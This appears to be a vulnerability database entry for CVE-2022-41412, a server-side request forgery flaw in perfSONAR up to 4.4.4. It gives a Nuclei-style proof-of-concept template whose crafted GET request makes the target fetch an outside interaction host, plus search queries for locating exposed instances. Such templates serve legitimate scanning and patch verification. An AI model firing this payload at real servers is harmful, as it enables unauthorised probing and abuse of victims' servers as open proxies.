CVE-2022-41412: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery

日期: 2025-08-01 | 影响软件: perfSONAR | POC: 已公开

漏洞描述

An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.

PoC代码[已公开]

id: CVE-2022-41412

info:
  name: perfSONAR 4.x <= 4.4.4 - Server-Side Request Forgery
  author: null_hypothesis
  severity: high
  description: |
    An issue in the graphData.cgi component of perfSONAR v4.4.5 and prior allows attackers to access sensitive data and execute Server-Side Request Forgery (SSRF) attacks.
  reference:
    - https://github.com/renmizo/CVE-2022-41412
    - https://hackerone.com/reports/2445802
    - https://github.com/perfsonar/graphs/commit/463e1d9dc30782d9b1c002143551ec78b74e03bb
    - https://www.perfsonar.net/releasenotes-2022-09-20-4-4-5.html
    - http://packetstormsecurity.com/files/170069/perfSONAR-4.4.4-Open-Proxy-Relay.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cve-id: CVE-2022-41412
    cwe-id: CWE-918
    epss-score: 0.89306
    epss-percentile: 0.99521
    cpe: cpe:2.3:a:perfsonar:perfsonar:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: perfsonar
    product: perfsonar
    fofa-query:
      - title="perfSONAR Toolkit"
      - title="perfsonar toolkit"
  tags: cve,cve2022,ssrf,hackerone,packetstorm,perfsonar

http:
  - method: GET
    path:
      - "{{BaseURL}}/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - <h1> Interactsh Server </h1>

      - type: status
        status:
          - 200
# digest: 490a0046304402201b037e5a3eec8a2310f9b7fe4be1cf15d933c3a07b78b78bfa3d47e48f9715ba02200244ddf1ea5c4a6f71ce36947df95b9e3f34b37bd95605a869f195848d6d477f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐